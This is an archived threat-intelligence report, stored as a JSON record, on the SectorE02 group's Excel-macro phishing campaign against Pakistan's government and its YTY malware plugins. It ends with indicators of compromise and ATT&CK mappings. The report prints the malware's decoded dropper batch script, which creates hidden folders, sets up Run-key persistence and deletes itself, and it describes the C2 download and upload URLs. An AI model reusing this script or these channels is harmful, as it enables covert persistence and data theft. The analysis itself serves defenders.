{
	"id": "ecce331b-4f05-4880-a1cf-0bc6678eff4a",
	"created_at": "2026-04-06T00:21:10.742576Z",
	"updated_at": "2026-04-10T13:12:00.463486Z",
	"deleted_at": null,
	"sha1_hash": "559510923d4fa0e1f0d3ec6a210a49d09903c3e8",
	"title": "SectorE02 Updates YTY Framework in New Targeted Campaign Against Pakistan Government – Red Alert",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1613443,
	"plain_text": "SectorE02 Updates YTY Framework in New Targeted Campaign\r\nAgainst Pakistan Government – Red Alert\r\nArchived: 2026-04-05 17:01:18 UTC\r\nOverview\r\nFrom March to July this year, the ThreatRecon team noticed a spear phishing campaign by the SectorE02 group\r\ngoing on against the Government of Pakistan and organizations there related to defense and intelligence. Spear\r\nphishing emails are sent to their victims via Excel XLS files, which asks their victims to enable macros which will\r\nend up executing the downloader. Malicious document lures they have employed in recent times include a\r\ndocument purporting to be for registration for the Pakistan Air Force.\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 1 of 13\n\nSecurity advisory by the Pakistan government regarding targeted attacks\r\nSectorE02 is a threat actor which targets countries in South Asia, especially Pakistan, since at least 2012. Their\r\narsenal includes a modular framework researchers have dubbed the “YTY Framework”, which has a Windows and\r\nmobile version. Usage of this framework allows the SectorE02 group to constantly modify and even remake\r\nindividual plugins of the framework, and pick and choose which plugins – if any – are sent to their victims. This\r\nmodularity also allows the SectorE02 group to maintain low detections by antivirus engines because each module\r\nonly does something simple and will not even work without certain previously dropped files. In this post, we will\r\ndescribe their lure document, first stage downloader, file plugin, screenshot plugin, keylogger plugin, and\r\nexfiltration uploader plugin.\r\nExcel Spear Phishing\r\nThe excel file used by them had names such as Credit_Score.xls, Advance_Salary.xls, CSD_Schemes_2019.xls,\r\nand Agrani_Bank.xls. In some instances, it masqueraded as an Excel calculator from the National Bank of\r\nPakistan.\r\nLure document 1\r\nIn later stages of the campaign, however, the group appeared to switch to using a MsgBox to show an error saying\r\n“This file is corrupted”.\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 2 of 13\n\nLure document 2\r\nAt the back, the excel macro would retrieve encoded data stored in itself, and the encoding here is just a simple\r\ndecimal encoding with a comma (or exclamation mark) as a separator. The same encoding is used for the dropped\r\nexecutable, although more often one entire file is encoded as a zip archive containing two files – a batch script and\r\nexecutable which is then unzipped and executed.\r\nAll four files here are illustration copied files from the original “.txt”, “.pdf”, and “.inp” files which are actually\r\nexecutable binaries\r\nExample Encoded Batch File in XLS Doc using Comma Separator\r\n101,99,104,111,32,111,102,102,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80\r\nThe dropped batch scripts follow the same basic format: creating folders with the hidden, system, and archive\r\nattributes, dropping the batch and executable files there, and setting persistence through either scheduled tasks or\r\nthe autorun registry key. A text file containing the %COMPUTERNAME% variable and random digits will also\r\nbe saved as “win.txt”, and this file is required for the executable downloader.\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 3 of 13\n\nA dump showing the scheduled task created by the batch script\r\nThe batch file that is dropped is used for three main purposes: 1) to set up the first folder, which is used to store\r\nthe text file containing the computer name, 2) to set up what we call the “common exfiltration folder” which each\r\nindividual plugin uses for different purposes, and 3) to set up persistence via scheduled task or registry run keys.\r\nExample Decoded Batch File in XLS Doc\r\n/echo off\r\nrd /s /q %USERPROFILE%\\Printers\\Neighbourhood\\Spools\r\nrd /s /q %USERPROFILE%\\Print\\Network\\Server\r\nrd /s /q %USERPROFILE%\\DriveData\\Files\r\nrd /s /q %USERPROFILE%\\DriveData\\Wins\r\nmd %USERPROFILE%\\Printers\\Neighbourhood\\Spools\r\nmd %USERPROFILE%\\DriveData\\Files\r\nmd %USERPROFILE%\\DriveData\\Wins\r\nmd %USERPROFILE%\\Print\\Network\\Server\r\nattrib +a +h +s “%USERPROFILE%\\DriveData”\r\nattrib +a +h +s “%USERPROFILE%\\Printers”\r\nattrib +a +h +s “%USERPROFILE%\\Print”\r\nSET /A %COMPUTERNAME%\r\nSET /A RAND=%RANDOM% 10000 + 1\r\necho %COMPUTERNAME%-%RAND% \u003e\u003e %USERPROFILE%\\DriveData\\Files\\win.txt\r\necho %COMPUTERNAME%-%RAND% \u003e\u003e %USERPROFILE%\\DriveData\\Wins\\win.txt\r\nreg delete “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Files /f\r\nreg delete “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Wins /f\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 4 of 13\n\nreg delete “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v BigSyn /f\r\nreg delete “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Dataupdate /f\r\nreg add “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Files /t REG_SZ /d %USERPROFILE%\\DriveData\\Wins\\\r\nreg add “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Wins /t REG_SZ /d %USERPROFILE%\\DriveData\\Files\\\r\nreg add “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v BigSyn /t REG_SZ /d %USERPROFILE%\\DriveData\\File\r\nreg add “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v BigUpdate /t REG_SZ /d %USERPROFILE%\\DriveData\\F\r\nreg add “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Dataupdate /t REG_SZ /d %USERPROFILE%\\DriveData\\\r\nmove %userprofile%\\AppData\\juchek.ttp %userprofile%\\DriveData\\Wins\r\nren %userprofile%\\DriveData\\Wins\\juchek.ttp juchek.exe\r\ndel %0\r\nDownloader\r\n(b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384)\r\nLooking at the latest downloader executable which masquerades its filename as an InPage word document\r\n(bgfRdstr54sf.inp), it starts off by using CreateEventA as a mutex with the value “ab567” and only works if the\r\nfile %USERPROFILE%\\DriveData\\Files\\win.txt exists. It polls the C2 server every 100 or so seconds. It uses the\r\nfixed user agent string “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”, and\r\nperforms a HTTPS GET against servicejobs[.]life/orderme/[computername]-[random].\r\n  This is a change from their previous URL structure, “/orderme”, which contained the file(s) to be downloaded,\r\nand this allows them to cherry pick their victims – unless the SectorE02 operator specifically places the next stage\r\nmalware in the server directory for a particular victim, that victim will only ever be infected with the downloader.\r\n  The downloader malware accepts three commands from the server, when the Content-Type response is “Content-Type: application”, “Content-Type: cmdline”, or “Content-Type: batcmd”, which are used for saving files to disk\r\nor executing files/commands on the system. This is how the next stage downloader or plugins can be executed on\r\nthe victim system.\r\nScreenshot Plugin\r\n(f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5)\r\nThis executable plugin takes a screenshot every two minutes using the Windows API to draw the raw screen\r\nbitmap to the common exfiltration folder, %USERPROFILE%\\Print\\Network\\Server\\. It then converts this raw\r\nbitmap to a JPG in a new file and deletes the raw bitmap file.\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 5 of 13\n\nCode in the screenshot plugin creating the raw bitmap\r\nThe screenshot files are named in the format of “tm_hour-tm_min-tm_sec-tm_year-tm_mday-tm_mon” [1].\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 6 of 13\n\nScreenshot JPGs created by the screenshot plugin\r\nLike some of the other YTY components, the obfuscated strings can be deobfuscated by running both the base64\r\nand reverse string algorithm multiple (in this case, three) times.\r\nThe strings can be deobfuscated by running both the base64 and reverse algorithm three times\r\nFile Listing Plugin\r\n(d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa)\r\nThis executable plugin recursively searches through the “C:”, “D:”, “E:”, “F:”, “G:”, and “H:” drives, looking for\r\ninteresting file extensions shown below. Several default folders are avoided by the malware.\r\nNote that the “.inp” extension is for “Urdu InPage”, a word processing program which supports languages such as\r\nUrdu which is the national language of Pakistan. The extensions the 2019 version of this plugin did not previously\r\nlook for are “.odt” and “.eml”, and “.rft” is just a spelling mistake they made of “.rtf”.\r\nThe latest version of the plugin looks for files with containing any of 14 different file extensions\r\nIt only looks for files modified later than year 2017 and saves the text data of all matching files found in\r\n%APPDATA%\\DriveData\\Files\\clist.log using the format of “File Path|Size WriteTimestamp l_flag”.\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 7 of 13\n\nFile path and names for exfiltration are saved to a clist.log file\r\nA copy of these matching files are also saved to the common exfiltration folder,\r\n%USERPROFILE%\\Print\\Network\\Server\\. The copied files are individually saved with the file names being the\r\nfull file path to the copied file, with slashes becoming underscores.\r\nExact copies of files the plugin is looking for is saved to the common exfiltration folder\r\nKeylogger Plugin\r\n(f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37)\r\nThis plugin starts off by using CreateEventA as a mutex with the value “k4351”. It saves user keystrokes and\r\nwhich window title those keystrokes were pressed in the common exfiltration folder,\r\n%USERPROFILE%\\Print\\Network\\Server\\. The file is saved as “[username]_YYYY_MM_DD(HH_mm_ss).txt”.\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 8 of 13\n\nExample of input captured by the keylogger plugin\r\nUploader Plugin\r\n(d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e)\r\nThis plugin starts off by using CreateEventA as a mutex with the value “MyEvent3525” and only works if the file\r\n%USERPROFILE%\\DriveData\\Files\\win.txt exists . While the other plugins dump their files into the common\r\nexfiltration folder, the uploader plugin takes the files from that folder and uploads it to the C2 server, which is the\r\nsame server as the downloader C2 server. The uploaded files are deleted immediately after.\r\nThe uploader performs a HTTP POST to /upload/[computername] of the file using HTTP forms with the same\r\nhard coded user-agent as their downloader malware, “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0)\r\nGecko/20100101 Firefox/52.0”.\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 9 of 13\n\nData sent to the C2 server through HTTPS for exfiltration\r\nSummary\r\nWhile the use of a modular framework is not a new concept, we see that the SectorE02 group’s continuous\r\nremaking of their YTY framework plugins which serve the same purpose allows them to keep detections by\r\nsecurity tools at a minimum. Based on their campaigns and the plugins we have seen, we believe they may be\r\nrecreating each plugin on a per-campaign basis, meaning that each attack campaign might be targeting with new\r\nbinaries coded from scratch and be hardly detected by security tools. At the same time, their newfound\r\ncautiousness in protecting their binaries from being downloaded and limited targeting means that the hardest part\r\nof detecting and responding to the SectorE02 group may be finding their related binaries in the first place.\r\nIndicators of Compromise (IoCs)\r\nMalicious Excel Files (SHA-256)\r\n1f64ab4db42ad68b4b99120ef6e9d1409cf606d31d932c0d306bb11c8ddcb2b4\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 10 of 13\n\n5a70d423fb336448fc7a71fbc3c7a4f0397bc7fa1ec32f7cc42824a432051c33\r\n95ea070bbfca04fff58a7092d61527aad0474914ffd2501d96991faad1388c7a\r\nfdcf3873df6f83336539c4997ce69fce459737c6d655f1972422f861437858a9\r\n6d0a3c4b2414c59be1190710c09330f4dd07e7badc4194e592799783f1cfd055\r\n7703c3385894dd3468c468745c747bf5c75f37a9b1fcaf2a1d0f291ecb7abce6\r\naa1c8adc4b7d352e487842b1d3017f627230ff1057350aaca1ffeb4d6abae16a\r\na06a5b1d63ca67da90ba6cd9cbc00d6872707a1b49d44de26d6eb5ce7dd7d545\r\ncc2c2694d0284153605a98c0e7493fb90aff0d78e7f03e37c80fb505fbf3f93f\r\n6d0a3c4b2414c59be1190710c09330f4dd07e7badc4194e592799783f1cfd055\r\n42775c20aa5b73b2eaecb5b107ce59d105f978660e6e43f53f804733ce3f7cbe\r\nf0c85a1c9cf80ad424acebbe7af54176d0cb778a639da2f2f59828af5bb79842\r\nDropped Batch Scripts (SHA-256)\r\n92b12010772166647f510ad91731e931d58bc077bfc9f9d39adc678cc00fb65d\r\n1b46735d6b6aebefd5809274de1aaa56b5fac314b33c2fa51b001e07b4f7e4d7\r\n57a9a17baaf61de5cffa8b2e2ec340a179e7e1cd70e046cbd832655c44bc7c1d\r\ncd03ed9e4f3257836e11016294c8701baa12414b59f221e556cbed16a946b205\r\nce1df70e96b4780329d393ff7a37513aec222030e80606ee3ef99b306951d74d\r\n9169dab8579d49253f72439f7572e0aabeb685c5ca63bf91fff81502764e79bb\r\nDropped YTY Downloaders (SHA-256)\r\n5acfd1b49ae86ef66b94a3e0209a2d2a3592c31b57ccbaa4bb9540fcf3403574\r\n08b11f246e2ebcfc049f198c055fc855e0af1f8499ba18791e3232efa913b01a\r\n62dfec7fe0025e8863c2252abb4ec1abdb4b916b76972910c6a47728bfb648a7\r\n13f27543d03fd4bee3267bdc37300e578994f55edabc031de936ff476482ceb4\r\nb874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384\r\ne726c07f3422aaee45187bae9edb1772146ccac50315264b86820db77b42b31c\r\nYTY File Plugin\r\n8fff7f07ebf0a1e0a4eabdcf57744739f39de643d831c36416b663bd243590e1\r\nd71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa \r\nYTY Screenshot Plugin\r\nf10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5\r\nYTY Keylogger Plugin\r\nf331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37\r\nYTY File Exfiltration Uploader Plugin\r\nd4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e\r\nIP Addresses\r\n179[.]43[.]170[.]155\r\n5[.]135[.]199[.]26\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 11 of 13\n\nDomains\r\ndata-backup[.]online\r\nservicejobs[.]life\r\nMITRE ATT\u0026CK Techniques\r\nThe following is a list of MITRE ATT\u0026CK Techniques we have observed based on our analysis of these malware.\r\nInitial Access\r\nT1193 Spearphishing Attachment\r\nExecution\r\nT1059 Command-Line Interface\r\nT1053 Scheduled Task\r\nT1064 Scripting\r\nT1204 User Execution\r\nPersistence\r\nT1158 Hidden Files and Directories\r\nT1060 Registry Run Keys / Startup Folder\r\nT1053 Scheduled Task\r\nDefense Evasion\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1107 File Deletion\r\nT1158 Hidden Files and Directories\r\nT1066 Indicator Removal from Tools\r\nT1112 Modify Registry\r\nT1027 Obfuscated Files or Information\r\nT1064 Scripting\r\nCredential Access\r\nT1056 Input Capture\r\nDiscovery\r\nT1010 Application Window Discovery\r\nT1083 File and Directory Discovery\r\nT1082 System Information Discovery\r\nT1497 Virtualization/Sandbox Evasion\r\nCollection\r\nT1119 Automated Collection\r\nT1005 Data from Local System\r\nT1039 Data from Network Shared Drive\r\nT1025 Data from Removable Media\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 12 of 13\n\nT1074 Data Staged\r\nT1114 Email Collection\r\nT1056 Input Capture\r\nT1113 Screen Capture\r\nCommand and Control\r\nT1043 Commonly Used Port\r\nT1071 Standard Application Layer Protocol\r\nExfiltration\r\nT1020 Automated Exfiltration\r\nT1041 Exfiltration Over Command and Control Channel\r\nReferences\r\nSource: https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/"
	],
	"report_names": [
		"sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government"
	],
	"threat_actors": [
		{
			"id": "2ac63ef4-a7b8-4a30-96ad-b30ccb2073fc",
			"created_at": "2022-10-25T16:07:23.546262Z",
			"updated_at": "2026-04-10T02:00:04.651083Z",
			"deleted_at": null,
			"main_name": "Donot Team",
			"aliases": [
				"APT-C-35",
				"Mint Tempest",
				"Origami Elephant",
				"SectorE02"
			],
			"source_name": "ETDA:Donot Team",
			"tools": [
				"BackConfig",
				"EHDevel",
				"Jaca",
				"yty"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cfdd350b-de30-4d29-bbee-28159f26c8c2",
			"created_at": "2023-01-06T13:46:38.433736Z",
			"updated_at": "2026-04-10T02:00:02.972971Z",
			"deleted_at": null,
			"main_name": "VICEROY TIGER",
			"aliases": [
				"OPERATION HANGOVER",
				"Donot Team",
				"APT-C-35",
				"SectorE02",
				"Orange Kala"
			],
			"source_name": "MISPGALAXY:VICEROY TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434870,
	"ts_updated_at": 1775826720,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/559510923d4fa0e1f0d3ec6a210a49d09903c3e8.pdf",
		"text": "https://archive.orkl.eu/559510923d4fa0e1f0d3ec6a210a49d09903c3e8.txt",
		"img": "https://archive.orkl.eu/559510923d4fa0e1f0d3ec6a210a49d09903c3e8.jpg"
	}
}